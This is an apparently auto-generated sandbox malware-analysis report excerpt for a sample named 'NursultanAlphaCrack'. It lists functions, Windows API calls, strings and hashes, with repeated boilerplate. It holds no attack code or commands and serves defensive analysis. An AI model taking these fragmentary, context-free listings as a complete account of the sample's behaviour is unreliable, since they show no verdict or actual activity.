Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0dc0fe2b86fd25844705c76f79bc8ec98436d8e88d9e4500e7ecf01ddd8e48dd
Instruction ID: 870437821b6f03062069342634a2801930d199fddcdaca6594df7ef740d43922
Opcode Fuzzy Hash: 0dc0fe2b86fd25844705c76f79bc8ec98436d8e88d9e4500e7ecf01ddd8e48dd
Instruction Fuzzy Hash: 27A012C515C0467C700831002D02C3B014CC0D1F62330451FF401CC2806A401C003470

Function 001DE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE580

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7a309591b568f655615a12b57150e33ca472998272960853f2c9c498bbc1fc99
Instruction ID: c2db7de7044427e041dfa55ddd493ef7d7a0f7296a8e4c6ed9f6bdb1a173fd5c
Opcode Fuzzy Hash: 7a309591b568f655615a12b57150e33ca472998272960853f2c9c498bbc1fc99
Instruction Fuzzy Hash: 5FA012C519C0457C700871502D02C37014CC4C0B63331441FF401C82C06A4018002470

Function 001DE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE580

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 723418da0ebe85c1826c131abd9bcf60c05012313edce421d8f81c83fb5b0fe4
Instruction ID: c2db7de7044427e041dfa55ddd493ef7d7a0f7296a8e4c6ed9f6bdb1a173fd5c
Opcode Fuzzy Hash: 723418da0ebe85c1826c131abd9bcf60c05012313edce421d8f81c83fb5b0fe4
Instruction Fuzzy Hash: 5FA012C519C0457C700871502D02C37014CC4C0B63331441FF401C82C06A4018002470

Function 001C9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,001C903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 001C9F0C

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: c0e76a368f3818886a1704336376efa3724d2aef78baab7651d459e0fddfd6a9
Instruction ID: 1761596a60b1edf2f0891b1d52ceb86c337aa787ed8f37a09446bec3191039ea
Opcode Fuzzy Hash: c0e76a368f3818886a1704336376efa3724d2aef78baab7651d459e0fddfd6a9
Instruction Fuzzy Hash: 38A0113008000A8A8E802B30CA0802C3B20EBA0BC030002A8A00ACA8A2CB22888BCA00

Function 001DAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,001DAE72,C:\Users\user\Desktop,00000000,0020946A,00000006), ref: 001DAC08

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: c50f3366c9d631f360750d662a81a142830ce9ba8ca44baa3ba11cb551d5e108
Instruction ID: a963400eb571d1d87bd40a11115bfd6a0378c03fde6cdc3debf0fec62bbeb745
Opcode Fuzzy Hash: c50f3366c9d631f360750d662a81a142830ce9ba8ca44baa3ba11cb551d5e108
Instruction Fuzzy Hash: ABA011302082008B82000B328F0AA0EBAAAAFA2B00F00C028A00080030CB30C8A0EA00

Function 001C9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,001C95D6,?,?,?,?,?,001F2641,000000FF), ref: 001C963B

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: dbb145a95ed37b3b59738b5fb0f790ed51e28419fbbae2f7a62b4914ba33095c
Instruction ID: f9a09e120b579f93470e18360361db9889c9e0659e9d28534d60b15279b7799c
Opcode Fuzzy Hash: dbb145a95ed37b3b59738b5fb0f790ed51e28419fbbae2f7a62b4914ba33095c
Instruction Fuzzy Hash: C3F08270481B259FDB308A24C45CF92B7E9AB32321F045B1ED4F7429E0D771E98DCA40

Non-executed Functions

Function 001DC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 001DC2B1
EndDialog.USER32(?,00000006), ref: 001DC2C4
GetDlgItem.USER32(?,0000006C), ref: 001DC2E0
SetFocus.USER32(00000000), ref: 001DC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 001DC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 001DC358
FindFirstFileW.KERNEL32(?,?), ref: 001DC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001DC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 001DC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001DC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001DC3D4
_swprintf.LIBCMT ref: 001DC404

Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 001DC417
FindClose.KERNEL32(00000000), ref: 001DC41E
_swprintf.LIBCMT ref: 001DC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 001DC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 001DC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 001DC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 001DC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001DC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001DC509
_swprintf.LIBCMT ref: 001DC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 001DC548
_swprintf.LIBCMT ref: 001DC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 001DC5AF

Part of subcall function 001DAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001DAF35
Part of subcall function 001DAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,001FE72C,?,?), ref: 001DAF84

Strings

%s %s, xrefs: 001DC469, 001DC58E
REPLACEFILEDLG, xrefs: 001DC247
%s %s %s, xrefs: 001DC3F2, 001DC527

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 1d56f67ef8d8f58b0f46fcf0b04e42281b6f65d4aaabe769d74fbb8acfa6c13a
Instruction ID: 9275dcc92dde22845b1f8c6d8a3c1a8cb32528408e2b338dfb5a67ba102e1c9c
Opcode Fuzzy Hash: 1d56f67ef8d8f58b0f46fcf0b04e42281b6f65d4aaabe769d74fbb8acfa6c13a
Instruction Fuzzy Hash: 7B919172248349BBD231DBA4DC49FFB77ACEB59700F00481AB749D6181DB75EA05CBA2

Function 001C6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C6FAA
_wcslen.LIBCMT ref: 001C7013
_wcslen.LIBCMT ref: 001C7084

Part of subcall function 001C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001C7AAB
Part of subcall function 001C7A9C: GetLastError.KERNEL32 ref: 001C7AF1
Part of subcall function 001C7A9C: CloseHandle.KERNEL32(?), ref: 001C7B00

Part of subcall function 001CA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,001C977F,?,?,001C95CF,?,?,?,?,?,001F2641,000000FF), ref: 001CA1F1
Part of subcall function 001CA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,001C977F,?,?,001C95CF,?,?,?,?,?,001F2641), ref: 001CA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 001C7139
CloseHandle.KERNEL32(00000000), ref: 001C7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 001C7298

Part of subcall function 001C9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001C73BC,?,?,?,00000000), ref: 001C9DBC
Part of subcall function 001C9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 001C9E70

Part of subcall function 001C9620: CloseHandle.KERNELBASE(000000FF,?,?,001C95D6,?,?,?,?,?,001F2641,000000FF), ref: 001C963B

Part of subcall function 001CA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA501
Part of subcall function 001CA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA532

Strings

UNC\, xrefs: 001C7051
SeCreateSymbolicLinkPrivilege, xrefs: 001C6FCC
SeRestorePrivilege, xrefs: 001C6FC2
\??\, xrefs: 001C702B

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: b67bb171ef893233b63942543642b82781b58749041cc17b7ff2f82a298fe436
Instruction ID: cf09d581c87a2d6bbb1b9ba8110cf2f401d27a190288f4aec4af6de95488f2fe
Opcode Fuzzy Hash: b67bb171ef893233b63942543642b82781b58749041cc17b7ff2f82a298fe436
Instruction Fuzzy Hash: 54C1C371904648AADB25EB74CC45FEEB3A8BF34300F04455EFA56E7282DB74EA44CB61

Function 001ED8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001EDA34

Strings

1#QNAN, xrefs: 001EEC3A
1#INF, xrefs: 001EEC41
1#IND, xrefs: 001EEC2C
1#SNAN, xrefs: 001EEC33

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 61c8b94092174953596e867187e6b9557592dc2ae5222c6946403ae08e1368ad
Instruction ID: d62418196281482a85c2a741eca8049de3762df234896034bc9eeca349cd5d51
Opcode Fuzzy Hash: 61c8b94092174953596e867187e6b9557592dc2ae5222c6946403ae08e1368ad
Instruction Fuzzy Hash: D3C23971E08A688FDB29CE299D407EEB7F5EB44304F1541EAD44EE7281E775AE818F40

Function 001C32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C3300
_swprintf.LIBCMT ref: 001C36C7

Strings

h%u, xrefs: 001C36BC
CMT, xrefs: 001C3A17
hc%u, xrefs: 001C370A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: eb06f6b53c8f0b3eb559b14f000d29ad52b8af17babc654a44ec11e3ec9c9bec
Instruction ID: 96d4d0d254376aca5b0b6a3b3fd6725e18f593ffca3d1eac141bbc5bc2e02dfb
Opcode Fuzzy Hash: eb06f6b53c8f0b3eb559b14f000d29ad52b8af17babc654a44ec11e3ec9c9bec
Instruction Fuzzy Hash: E232A171514285ABDB18DF74C896FEA3BA5AF35300F04447DFD9A8B282DB70DA49CB60

Function 001C286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C2874
_strlen.LIBCMT ref: 001C2E3F

Part of subcall function 001D02BA: __EH_prolog.LIBCMT ref: 001D02BF

Part of subcall function 001D1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001CBAE9,00000000,?,?,?,00010440), ref: 001D1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C2F91

Strings

CMT, xrefs: 001C2FBC

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 7b401467689371bd98c8973432acaf5ea534297f94b87fd0019e3bbe9d59f907
Instruction ID: 599057151ec4f4f0ae65a0d6b95a11294542de8d5e76bb94512366d5f6f63875
Opcode Fuzzy Hash: 7b401467689371bd98c8973432acaf5ea534297f94b87fd0019e3bbe9d59f907
Instruction Fuzzy Hash: C762E5715002458FDB19DF78C896FEA3BA1AF75300F08857EEC9A8B282DB75D945CB60

Function 001DF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001DF844
IsDebuggerPresent.KERNEL32 ref: 001DF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001DF930
UnhandledExceptionFilter.KERNEL32(?), ref: 001DF93A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 27a3281027248a889bc0c463bea88591cf2823cc0c7744d1cc0a02576f4d0296
Instruction ID: 76a2d1ee229c98434d3f0ee48ef83347a747bc30f9d09888071e42ea006fd04d
Opcode Fuzzy Hash: 27a3281027248a889bc0c463bea88591cf2823cc0c7744d1cc0a02576f4d0296
Instruction Fuzzy Hash: CB312575D052199BDB20DFA4D989BCCBBB8AF08304F1040AAE40DAB350EB719B85CF45

Function 001DE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,001DE5E8,0000001C,001DE7DD,00000000,?,?,?,?,?,?,?,001DE5E8,00000004,00221CEC,001DE86D), ref: 001DE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,001DE5E8,00000004,00221CEC,001DE86D), ref: 001DE6CF

Strings

D, xrefs: 001DE6C3

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 48fbdf413521ad1953bb28117f50206d54abb36c5be56ee7bb6d3a58e95dc321
Instruction ID: 648354cf19f54459c7d865edbd6f203afeabdf26ec129e628f83cba51544fef0
Opcode Fuzzy Hash: 48fbdf413521ad1953bb28117f50206d54abb36c5be56ee7bb6d3a58e95dc321
Instruction Fuzzy Hash: BD01F736A001196BDB14EE29DC09BED7BFAAFC4325F0CC121ED19DB250D734D945C680

Function 001E8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001E8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001E8FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001E8FCC

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 0798a621b470bd0e65382690c7a12dea19bb0d3024f4f99908580312da0e8f0f
Instruction ID: 97a9f542bd74846f259fd904af0f835d7d3a478a860407b483c78cb5e005506f
Opcode Fuzzy Hash: 0798a621b470bd0e65382690c7a12dea19bb0d3024f4f99908580312da0e8f0f
Instruction Fuzzy Hash: E431C47590121CABCB21DF65DC89BDDBBB8AF18710F5041EAE41CA7290EB709F858F44

Function 001EB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 001EB4DB

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 38be161cee22455117a3893fa09764e8680cb629c7e740e2390fa404fd7c1b8b
Instruction ID: 34ea621e57a72aa0a0eb8f7792bb53d5958b4f241b827264b68fbb38eb3915e1
Opcode Fuzzy Hash: 38be161cee22455117a3893fa09764e8680cb629c7e740e2390fa404fd7c1b8b
Instruction Fuzzy Hash: BB310771904689AFCB249E7ACCC5EFF7BBDEB85314F0401A8F91997292E7309E458B50

Function 001ED440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

